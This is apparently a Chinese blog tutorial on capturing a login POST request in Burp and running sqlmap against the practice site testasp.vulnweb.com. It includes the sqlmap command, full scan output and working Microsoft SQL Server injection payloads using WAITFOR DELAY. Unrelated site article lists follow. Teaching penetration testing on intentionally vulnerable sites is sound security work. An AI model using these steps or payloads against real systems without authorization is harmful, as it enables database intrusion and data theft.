1. 浏览器打开目标地址 http://testasp.vulnweb.com/Login.asp
2. 配置burp代理(127.0.0.1:8080)以拦截请求
3. 点击login表单的submit按钮
4. 如下图,这时候Burp会拦截到了我们的登录POST请求

5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下
6. 运行sqlmap并使用如下命令:./sqlmap.py -r search-test.txt -p tfUPass,这里参数 -r 是让sqlmap加载我们的post请求rsearch-test.txt,而-p 大家应该比较熟悉,指定注入用的参数。

./sqlmap.py -r search-test.txt -p tfUPass

sqlmap/0.9 - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 13:26:52

[13:26:52] [INFO] parsing HTTP request from 'search-test.txt'

[13:26:52] [WARNING] the testable parameter 'tfUPass' you provided is not into the GET

[13:26:52] [WARNING] the testable parameter 'tfUPass' you provided is not into the Cookie

[13:26:52] [INFO] using '/home/testuser/sqlmap/output/testasp.vulnweb.com/session' as session file

[13:26:52] [INFO] resuming injection data from session file

[13:26:52] [WARNING] there is an injection in POST parameter 'tfUName' but you did not provided it this time

[13:26:52] [INFO] testing connection to the target url

[13:26:53] [INFO] testing if the url is stable, wait a few seconds

[13:26:55] [INFO] url is stable

[13:26:55] [WARNING] heuristic test shows that POST parameter 'tfUPass' might not be injectable

[13:26:55] [INFO] testing sql injection on POST parameter 'tfUPass'

[13:26:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[13:27:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[13:27:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'

[13:27:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'

[13:27:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'

[13:27:12] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[13:27:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries'

[13:27:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'

[13:27:30] [INFO] POST parameter 'tfUPass' is 'Microsoft SQL Server/Sybase stacked queries' injectable

[13:27:30] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[13:27:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'

[13:27:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'

[13:27:42] [INFO] POST parameter 'tfUPass' is 'Microsoft SQL Server/Sybase time-based blind' injectable

[13:27:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[13:27:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

[13:27:48] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS

sqlmap got a 302 redirect to /Search.asp - What target address do you want to use from now on? http://testasp.vulnweb.com:80/Login.asp (default) or provide another target address based also on the redirection got from the application

>

[13:27:58] [INFO] target url appears to be UNION injectable with 2 columns

POST parameter 'tfUPass' is vulnerable. Do you want to keep testing the others? [y/N] N

sqlmap identified the following injection points with a total of 68 HTTP(s) requests:

---

Place: POST

Parameter: tfUPass

    Type: stacked queries

    Title: Microsoft SQL Server/Sybase stacked queries

    Payload: tfUName=test&tfUPass=test'; WAITFOR DELAY '0:0:5';-- AND 'mPfC'='mPfC

    Type: AND/OR time-based blind

    Title: Microsoft SQL Server/Sybase time-based blind

    Payload: tfUName=test&tfUPass=test' WAITFOR DELAY '0:0:5'-- AND 'wpkc'='wpkc

---

[13:28:08] [INFO] testing MySQL

[13:28:09] [WARNING] the back-end DBMS is not MySQL

[13:28:09] [INFO] testing Oracle

[13:28:10] [WARNING] the back-end DBMS is not Oracle

[13:28:10] [INFO] testing PostgreSQL

[13:28:10] [WARNING] the back-end DBMS is not PostgreSQL

[13:28:10] [INFO] testing Microsoft SQL Server

[13:28:16] [INFO] confirming Microsoft SQL Server

[13:28:28] [INFO] the back-end DBMS is Microsoft SQL Server

web server operating system: Windows 2003

web application technology: ASP.NET, Microsoft IIS 6.0

back-end DBMS: Microsoft SQL Server 2005

[13:28:28] [WARNING] HTTP error codes detected during testing:

500 (Internal Server Error) - 42 times

[13:28:28] [INFO] Fetched data logged to text files under '/home/testuser/sqlmap/output/testasp.vulnweb.com'

最新文章

  1. ElasticSearch 5学习(8)——分布式文档存储(wait_for_active_shards新参数分析)
  2. CodeForces - 453A Little Pony and Expected Maximum
  3. cefsharp设置网页接受语言Accept-Language
  4. 对COM 组件的调用返回了错误 HRESULT E_FAIL
  5. LINUX下为ORACLE数据库设置大页--hugepage
  6. WampServer搭建php环境时出现的哪些问题?
  7. java继承关系中成员变量,构造方法,成员方法的关系
  8. Shell脚本编程——了解你的Linux系统必须掌握的20个命令
  9. java中this关键字和static关键字和super关键字的用法
  10. Azure上Linux VM防DDOS攻击:使用Apache mod_evasive
  11. 使用ReTrofit做缓存(结合上拉加载和下拉刷新)
  12. Zeroc Ice原理介绍
  13. HTML5智能表单
  14. Nginx详解二:Nginx基础篇之Nginx的优点
  15. OperateResult 基础类及派生类介绍
  16. [转帖]win10 .Net Runtime Optimization Service占用大量CPU资源解决方法
  17. 给font awesome中加入自定义图片
  18. Spark的任务调度
  19. ZJOI2002 昂贵的聘礼
  20. oracle数据库数据类型和约束

热门文章

  1. 忘记mysql超户密码的解决方法
  2. Xversion for Mac优秀的SVN客户端功能特色介绍
  3. 6371. 【NOIP2019模拟2019.9.28】基础图论练习题
  4. 【JZOJ6434】【luoguP5665】【CSP-S2019】划分
  5. 自定义checkbox,radio样式
  6. 【Linux】windows下编写的脚本文件,放到Linux中无法识别格式
  7. PHP ftp_chdir() 函数
  8. css定位的理解
  9. Ubuntu 16.04系统上修改Docker镜像的存储路径 (转)
  10. thinkphp 表单令牌